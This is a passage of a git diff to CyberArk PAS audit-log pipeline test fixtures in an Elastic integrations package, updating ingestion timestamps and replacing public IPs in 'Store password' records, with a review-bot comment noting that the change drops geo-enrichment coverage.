start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Safes History start\",\"GatewayStation\":\"\"}}}", "code": "290", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json index abd0f2230ab..db7bc649ddb 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json 
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-291-auto-clear-safes-history-end.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "auto clear safes history end", - "ingested": "2021-06-09T10:24:30.273314700Z", + "ingested": "2021-12-09T13:36:44.514883300Z", "original": "\u003c5\u003e1 2021-03-09T09:00:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 01:00:47\",\"IsoTimestamp\":\"2021-03-09T09:00:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"291\",\"Desc\":\"Auto Clear Safes History end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Auto Clear Safes History end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Auto Clear Safes History end\",\"GatewayStation\":\"\"}}}", "code": "291", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log index 2ea7c7cf132..8309f516cd2 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log 
@@ -2,9 +2,9 @@ <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-08T19:20:02Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 11:20:02","IsoTimestamp":"2021-03-08T19:20:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"26"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615231182"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614785704"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating 
System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} <5>1 2021-03-10T14:38:57Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 06:38:57","IsoTimestamp":"2021-03-10T14:38:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615387136"},{"Name":"CurrInd","Value":"1"}]}}}} -<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} -<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store 
password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} +<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} +<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} <5>1 2021-03-10T23:39:25Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 15:39:25","IsoTimestamp":"2021-03-10T23:39:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating 
System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountB"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"24"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615419536"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614868762"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"2"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} <5>1 2021-03-14T11:48:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 04:48:26\n 2021-03-14T11:48:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Groups\\WindowsGroup\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 04:48:26","IsoTimestamp":"2021-03-14T11:48:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615722505"},{"Name":"CurrInd","Value":"2"}]}}}} <5>1 2021-03-15T10:12:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:21\n 2021-03-15T10:12:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:21","IsoTimestamp":"2021-03-15T10:12:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"27"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615754905"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1615231204"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} -<5>1 2021-03-15T13:13:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:13:01\n 2021-03-15T13:13:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n Administrator\n Store password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 127.0.0.1\n \n \n \n \n \n Store password\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:13:01","IsoTimestamp":"2021-03-15T13:13:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:13:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:13:01\n 2021-03-15T13:13:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n Administrator\n Store password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 127.0.0.1\n \n \n \n \n \n Store password\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:13:01","IsoTimestamp":"2021-03-15T13:13:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json index dc5819971e1..eb5b8ea3f8b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-294-store-password.log-expected.json 
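Review bot: Replacing 81.32.170.205 and 35.192.121.42 with 67.43.156.13 and 67.43.156.14 in the two PSM `Store password` records makes the regenerated expected output drop the whole `source.geo` block (the `-289` and `-359` hunks of test-294-store-password.log-expected.json), so this fixture no longer exercises geo enrichment of `source.ip` from the `Station` field at all. If the reason for moving to the supported subset is deterministic geo data, presumably these two addresses have no city-level record in the test GeoIP database; picking addresses from the subset that do resolve would keep that coverage, and if the loss is intended it deserves a mention in the changelog entry. The third substitution, 34.123.103.115 to 67.43.156.15, only appears inside the `File` path and the `Address` CA property and is not IP-enriched, so it is unaffected. The unchanged `0.0.0.0`, `127.0.0.1` and `10.0.1.20` stations are unspecified, loopback and private addresses and need no change.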
@@ -62,7 +62,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301307700Z", + "ingested": "2021-12-09T13:36:44.612758400Z", "original": "\u003c5\u003e1 2021-03-08T10:19:42Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 02:19:42\",\"IsoTimestamp\":\"2021-03-08T10:19:42Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615198782\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "294", "kind": "event" 
@@ -129,7 +129,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301339100Z", + "ingested": "2021-12-09T13:36:44.612767300Z", "original": "\u003c5\u003e1 2021-03-08T18:24:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:49\",\"IsoTimestamp\":\"2021-03-08T18:24:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "294", "kind": "event" 
@@ -208,7 +208,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301345400Z", + "ingested": "2021-12-09T13:36:44.612772900Z", "original": "\u003c5\u003e1 2021-03-08T19:20:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:02\",\"IsoTimestamp\":\"2021-03-08T19:20:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"26\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615231182\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614785704\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" 
@@ -276,7 +276,7 @@
 "event": {
 "severity": 2,
 "action": "store password",
- "ingested": "2021-06-09T10:24:30.301349200Z",
+ "ingested": "2021-12-09T13:36:44.612778200Z",
 "original": "\u003c5\u003e1 2021-03-10T14:38:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:38:57\",\"IsoTimestamp\":\"2021-03-10T14:38:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615387136\"},{\"Name\":\"CurrInd\",\"Value\":\"1\"}]}}}}",
 "code": "294",
 "kind": "event"
@@ -289,20 +289,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -322,7 +310,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -332,7 +320,7 @@
 "iso_timestamp": "2021-03-10T17:58:06Z",
 "file": "Root\\PSMServer",
 "safe": "PSM",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Store password",
 "message": "Store password",
 "issuer": "Administrator",
@@ -346,8 +334,8 @@
 "event": {
 "severity": 2,
 "action": "store password",
- "ingested": "2021-06-09T10:24:30.301352300Z",
- "original": "\u003c5\u003e1 2021-03-10T17:58:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:06\",\"IsoTimestamp\":\"2021-03-10T17:58:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:36:44.612783600Z",
+ "original": "\u003c5\u003e1 2021-03-10T17:58:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:06\",\"IsoTimestamp\":\"2021-03-10T17:58:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}",
 "code": "294",
 "kind": "event"
 }
@@ -359,19 +347,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -391,7 +368,7 @@
 },
 "related": {
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -401,7 +378,7 @@
 "iso_timestamp": "2021-03-10T22:17:26Z",
 "file": "Root\\PSM-ASR-CYBERARK-WI",
 "safe": "PSM",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Store password",
 "message": "Store password",
 "issuer": "Administrator",
@@ -415,8 +392,8 @@
 "event": {
 "severity": 2,
 "action": "store password",
- "ingested": "2021-06-09T10:24:30.301355Z",
- "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:36:44.612789Z",
+ "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\"}}}",
 "code": "294",
 "kind": "event"
 }
